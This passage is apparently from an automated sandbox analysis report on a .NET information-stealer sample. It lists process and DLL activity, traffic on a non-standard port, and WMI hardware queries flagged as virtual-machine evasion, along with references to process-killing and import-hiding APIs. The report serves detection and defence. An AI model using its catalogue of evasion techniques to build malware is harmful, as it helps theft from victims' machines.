      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: 3K5MXGVOJE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: 3K5MXGVOJE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: 3K5MXGVOJE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ntkrnlmp.pdbxC4 source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbMZ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: Stealer.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Security.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: rnlmp.pdb\* source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdataataa source: 3K5MXGVOJE.exe, 00000000.00000002.1071835301.000000000773E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.IO.Compression.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \C#\Arcana\Stealer\obj\Release\Stealer.pdb source: 3K5MXGVOJE.exe
      Source: Binary string: System.Configuration.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.IO.Compression.pdbX$ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.00000000057BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS] source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: 3K5MXGVOJE.exeStatic PE information: 0x95B6C1D8 [Thu Aug 5 13:19:20 2049 UTC]
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .Nw
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .T]1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051A1414 push eax; mov dword ptr [esp], ecx0_2_051A1434
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A07A8C push esp; iretd 0_2_05A07A8D
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7949A push eax; ret 0_2_06C794A1
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .text entropy: 7.867046875219915
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .Nw entropy: 7.056379099711291
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .T]1 entropy: 6.844845731566418

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 1489
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
      Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
      Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
      Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
      Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 4C80000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWindow / User API: threadDelayed 9910Jump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: 3K5MXGVOJE.exeBinary or memory string: IsVirtualMachine
      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: 3K5MXGVOJE.exeBinary or memory string: <IsVirtualMachine>b__1_0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      .NET source code references suspicious native API functions
      Source: 3K5MXGVOJE.exe, Killer.csReference to suspicious API methods: OpenProcess(1u, (byte)bInheritHandle != 0, processId)
      Source: 3K5MXGVOJE.exe, ImportHider.csReference to suspicious API methods: LoadLibrary(dllName)
      Source: 3K5MXGVOJE.exe, ImportHider.csReference to suspicious API methods: GetProcAddress(intPtr, methodName)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
